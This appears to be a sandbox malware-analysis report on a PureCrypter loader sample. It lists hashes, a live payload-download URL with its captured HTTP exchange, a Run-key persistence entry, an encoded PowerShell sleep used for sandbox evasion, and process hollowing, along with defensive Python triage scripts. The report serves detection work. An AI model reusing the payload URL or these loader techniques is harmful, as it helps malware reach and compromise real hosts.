Analysis
max time kernel: 112s
max time network: 116s
platform: windows10-2004_x64
resource: win10v2004-20221111-en
resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
submitted: 13-02-2023 07:21
Behavioral task behavioral1
Sample: e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe
Resource: win7-20221111-en
Behavioral task behavioral2
Sample: e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe
Resource: win10v2004-20221111-en
General
Target: e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe
Size: 41KB
MD5: ab4a6ddfc90f2d379d70d0fad747f6e5
SHA1: 87ac21f928c9f4e3d76cc6ea110b6133defd8507
SHA256: e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90
SHA512: d0512d9629ffe3feee10f8f6bfa5419f97e1da78e7972866f76270326657b5760cc3bb3c594fe4ebbbb22571429f0fe88a007f75991db39136d22ff8dd274815
SSDEEP: 768:ppoHKflwYtttWtYtYBtYtxqGGGGGGGGHGGGGGGGGGGGGGGGGGGGGGGGGGGGGUu8y:DoHFGGGGGGGGHGGGGGGGGGGGGGGGGGGH
Malware Config
Extracted
purecrypter
http://163.123.142.210/Zhevuwz.dat
Signatures
PureCrypter
PureCrypter is a .NET malware loader first seen in early 2021. The configuration extracted from this sample points at http://163.123.142.210/Zhevuwz.dat, which the sample fetches in the Network section below (1541653 bytes, application/octet-stream).

Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely a geofence check.
Key value queried: \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation (process e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe)

Adds Run key to start application (2 TTPs, 1 IoC)
Set value (str): \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Vokaupcde = "\"C:\\Users\\Admin\\AppData\\Roaming\\Rrlirudzf\\Vokaupcde.exe\"" (process e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe)
The Run entry points at a copy under %APPDATA%\Rrlirudzf\. No write of Vokaupcde.exe to that path is listed anywhere in this report, so confirm the drop on a real host before treating the path as an indicator on its own.

Suspicious use of SetThreadContext (1 IoC)
PID 2728 (e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe) set the thread context of PID 5040 (procid_target 89), a second instance of the same executable.

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). The sandbox's generic text for this signature calls it "likely ransomware behaviour", but nothing else in this report (no file encryption, no mass file modification) supports that; in a loader it more plausibly reflects environment enumeration.

Suspicious behavior: EnumeratesProcesses (2 IoCs)
PID 996 powershell.exe (two occurrences)

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Token: SeDebugPrivilege, PID 2728 e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe
Token: SeDebugPrivilege, PID 996 powershell.exe
Token: SeDebugPrivilege, PID 5040 e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe

Suspicious use of WriteProcessMemory (8 IoCs)
PID 2728 wrote to memory of PID 996 (procid_target 81), two occurrences
PID 2728 wrote to memory of PID 5040 (procid_target 89), six occurrences
The two writes into 996 accompany the creation of powershell.exe and are not by themselves evidence of injection. The six writes into 5040, followed by SetThreadContext on that same child, which runs the sample's own image, are the process-hollowing pattern: start a suspended copy of self, overwrite its image with the payload, redirect the main thread, resume.
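The correlation described above, as an added example that is not part of the sandbox report or the sample: pair each WriteProcessMemory and SetThreadContext row with the process tree's image paths and flag only the pair where the target runs the writer's own image. The PIDs and paths are the ones this page lists; the event list is constructed from the IoC rows, and the function names are my own.

```python
import ntpath
from collections import defaultdict

# Constructed from this report's process tree and IoC rows: Windows PIDs, image paths and
# the WriteProcessMemory / SetThreadContext rows exactly as the sandbox listed them.
SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PROCESSES = {2728: SAMPLE, 996: POWERSHELL, 5040: SAMPLE}

# (source pid, API, target pid): two writes into 996, six writes plus one SetThreadContext into 5040.
EVENTS = (
    [(2728, "WriteProcessMemory", 996)] * 2
    + [(2728, "WriteProcessMemory", 5040)] * 6
    + [(2728, "SetThreadContext", 5040)]
)


def _same_image(processes, a, b):
    """Compare image file names case-insensitively; unknown PIDs never match."""
    if a not in processes or b not in processes:
        return False
    return ntpath.basename(processes[a]).lower() == ntpath.basename(processes[b]).lower()


def find_hollowing(processes, events):
    """Return one record per (source, target) pair where a process wrote into another
    process running its own image and then called SetThreadContext on it.
    Cross-process writes alone (a parent populating a freshly created child) are not
    flagged, which keeps the powershell.exe spawn out of the result."""
    counts = defaultdict(lambda: {"WriteProcessMemory": 0, "SetThreadContext": 0})
    for src, api, dst in events:
        if src != dst and api in ("WriteProcessMemory", "SetThreadContext"):
            counts[(src, dst)][api] += 1
    hits = []
    for (src, dst), c in counts.items():
        if c["SetThreadContext"] and c["WriteProcessMemory"] and _same_image(processes, src, dst):
            hits.append({"source": src, "target": dst, "writes": c["WriteProcessMemory"]})
    return hits


if __name__ == "__main__":
    for hit in find_hollowing(PROCESSES, EVENTS):
        print(f"hollowing candidate: {hit['source']} -> {hit['target']} "
              f"({hit['writes']} writes into {ntpath.basename(PROCESSES[hit['target']])})")
```

Run on the rows from this report it returns the single pair 2728 -> 5040 with six writes; the two writes into powershell.exe (different image, no SetThreadContext) stay unflagged, which is the distinction a detection rule needs to avoid firing on every process creation.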
Processes
C:\Users\Admin\AppData\Local\Temp\e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe (PID 2728)
command line: "C:\Users\Admin\AppData\Local\Temp\e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe"
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 996, child of 2728)
  command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
  The -ENC operand is base64 over UTF-16LE text and decodes to start-sleep -seconds 20: a 20-second sleep in a child process, a common sandbox-evasion delay.
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  C:\Users\Admin\AppData\Local\Temp\e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe (PID 5040, child of 2728)
  command line: C:\Users\Admin\AppData\Local\Temp\e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe
  - Suspicious use of AdjustPrivilegeToken
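Decoding the PowerShell command line from the process tree, as an added example that is not part of the sandbox report: pull the operand of -EncodedCommand out of a raw command line, honouring the abbreviated switch forms powershell.exe accepts (-e, -ec, -enc, ...), decode it as base64 over UTF-16LE, and recognise a script that is nothing but a Start-Sleep. The command line is copied from this page; the tokenizer, the delay heuristic and the function names are my own assumptions about how a triage script would handle it, and the logic is general rather than specific to this sample.

```python
import base64
import re

# Constructed from the PowerShell command line in this report's process tree.
OBSERVED_CMDLINE = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC '
    "cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA=="
)

# Minimal Windows command-line tokenizer: double-quoted runs stay whole, everything else splits on whitespace.
_TOKEN_RE = re.compile(r'"[^"]*"|\S+')

# A script whose only statement is a delay: "start-sleep -seconds 20", "sleep 5", "Start-Sleep -m 500".
_DELAY_RE = re.compile(r"^\s*(?:start-)?sleep\s+(?:-(?P<unit>[a-z]+)\s+)?(?P<n>\d+)\s*;?\s*$", re.IGNORECASE)


def extract_encoded_command(cmdline):
    """Return the operand of -EncodedCommand, or None. powershell.exe accepts any unambiguous
    prefix of the switch name (-e, -ec, -enc, -encodedcommand), so match by prefix."""
    tokens = _TOKEN_RE.findall(cmdline)
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] in "-/":
            name = tok[1:].lower()
            if name and "encodedcommand".startswith(name):
                return tokens[i + 1].strip('"')
    return None


def decode_encoded_command(b64):
    """-EncodedCommand carries base64 over the UTF-16LE bytes of the script text."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


def delay_seconds(script):
    """Seconds slept if the script is only a Start-Sleep, else None (unit prefixes: -s.., -m..)."""
    m = _DELAY_RE.match(script)
    if not m:
        return None
    n = int(m.group("n"))
    unit = (m.group("unit") or "seconds").lower()
    if "milliseconds".startswith(unit):
        return n / 1000
    if "seconds".startswith(unit):
        return n
    return None


def triage(cmdline):
    """None when no encoded command is present; otherwise the decoded script and its delay, if any."""
    b64 = extract_encoded_command(cmdline)
    if b64 is None:
        return None
    try:
        script = decode_encoded_command(b64)
    except (ValueError, UnicodeDecodeError):
        return {"script": None, "delay_seconds": None, "error": "operand is not valid base64/UTF-16LE"}
    return {"script": script, "delay_seconds": delay_seconds(script), "error": None}


if __name__ == "__main__":
    print(triage(OBSERVED_CMDLINE))
```

On the observed command line this yields the script start-sleep -seconds 20 and a delay of 20 seconds. The decode step uses strict base64 validation and catches odd-length UTF-16 so that a damaged or deliberately malformed operand is reported rather than crashing the triage run.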
Network
HTTP request: GET http://163.123.142.210/Zhevuwz.dat
process: e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe
remote address: 163.123.142.210:80

Request
GET /Zhevuwz.dat HTTP/1.1
Host: 163.123.142.210
Connection: Keep-Alive

Response
HTTP/1.1 200 OK
Date: Mon, 13 Feb 2023 07:22:03 GMT
Content-Type: application/octet-stream
Content-Length: 1541653
Last-Modified: Thu, 09 Feb 2023 23:51:37 GMT
Connection: keep-alive
ETag: "63e58709-178615"
Accept-Ranges: bytes

The captured request carries only Host and Connection headers (no User-Agent) and targets a bare IP, both usable as proxy detection features. The response has no Server header, but the ETag has the "<hex mtime>-<hex size>" shape nginx uses for static files: 0x63e58709 = 1675986697 = Thu, 09 Feb 2023 23:51:37 GMT, matching Last-Modified, and 0x178615 = 1541653, matching Content-Length. The 1.5 MB body was therefore a file on disk, placed there about three days before this submission, rather than content generated per request.
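Checking that response the way the paragraph above does, as an added example that is not part of the sandbox output: parse the raw response head, decode the ETag as nginx's hex mtime and hex size, compare both with Last-Modified and Content-Length, and fold the result into a one-record summary of the fetch. The raw response is copied from this page; the ETag layout is nginx's documented default, and the function names are mine.

```python
import email.utils
import re
from datetime import timezone

# Constructed from the HTTP response captured in this report.
RESPONSE = """HTTP/1.1 200 OK
Date: Mon, 13 Feb 2023 07:22:03 GMT
Content-Type: application/octet-stream
Content-Length: 1541653
Last-Modified: Thu, 09 Feb 2023 23:51:37 GMT
Connection: keep-alive
ETag: "63e58709-178615"
Accept-Ranges: bytes
"""

# nginx's default ETag for a static file: "<hex mtime>-<hex size>", optionally weak (W/).
_ETAG_RE = re.compile(r'^(?:W/)?"?([0-9a-f]+)-([0-9a-f]+)"?$', re.IGNORECASE)


def parse_response(raw):
    """Split a raw HTTP/1.1 response head into (status code, {lowercased header: value})."""
    lines = raw.strip().splitlines()
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return status, headers


def http_date_to_epoch(value):
    """RFC 7231 date (e.g. 'Thu, 09 Feb 2023 23:51:37 GMT') to Unix seconds; naive values are taken as UTC."""
    dt = email.utils.parsedate_to_datetime(value)
    if dt.tzinfo is None:
        dt = dt.replace(tzinfo=timezone.utc)
    return int(dt.timestamp())


def check_static_file_etag(headers):
    """Decode an nginx-style ETag and compare it with Last-Modified and Content-Length.
    Returns None when the ETag is not in that shape (other servers, dynamic content)."""
    m = _ETAG_RE.match(headers.get("etag", ""))
    if not m:
        return None
    mtime, size = int(m.group(1), 16), int(m.group(2), 16)
    return {
        "etag_mtime": mtime,
        "etag_size": size,
        "mtime_matches_last_modified": "last-modified" in headers
        and http_date_to_epoch(headers["last-modified"]) == mtime,
        "size_matches_content_length": headers.get("content-length", "").isdigit()
        and int(headers["content-length"]) == size,
    }


def summarize_download(url, raw_response):
    """Triage record for a payload fetch: host type, status, content type, size, and whether
    the ETag evidence says the body was a static file on disk."""
    status, headers = parse_response(raw_response)
    host = re.match(r"https?://([^/:]+)", url).group(1)
    etag = check_static_file_etag(headers) or {}
    return {
        "host": host,
        "bare_ip": re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}", host) is not None,
        "status": status,
        "content_type": headers.get("content-type"),
        "size": int(headers.get("content-length", 0)),
        "static_file": bool(etag.get("mtime_matches_last_modified") and etag.get("size_matches_content_length")),
    }


if __name__ == "__main__":
    print(summarize_download("http://163.123.142.210/Zhevuwz.dat", RESPONSE))
```

For the response above both comparisons hold, so the summary reports a 1541653-byte octet-stream served as a static file from a bare-IP host. When a server does not use this ETag layout the check returns None and the summary simply reports static_file as False rather than guessing.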
Flows
destination 163.123.142.210:80, url http://163.123.142.210/Zhevuwz.dat, protocol http, process e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe, sent 36.4 kB in 679 packets, received 1.6 MB in 1137 packets
  HTTP request: GET http://163.123.142.210/Zhevuwz.dat
  HTTP response: 200
Nine further flows survive only as byte and packet counts, with no destination or protocol recorded: 322 B / 7 packets (five flows), 260 B / 5 packets (three flows), 208 B / 4 packets (one flow).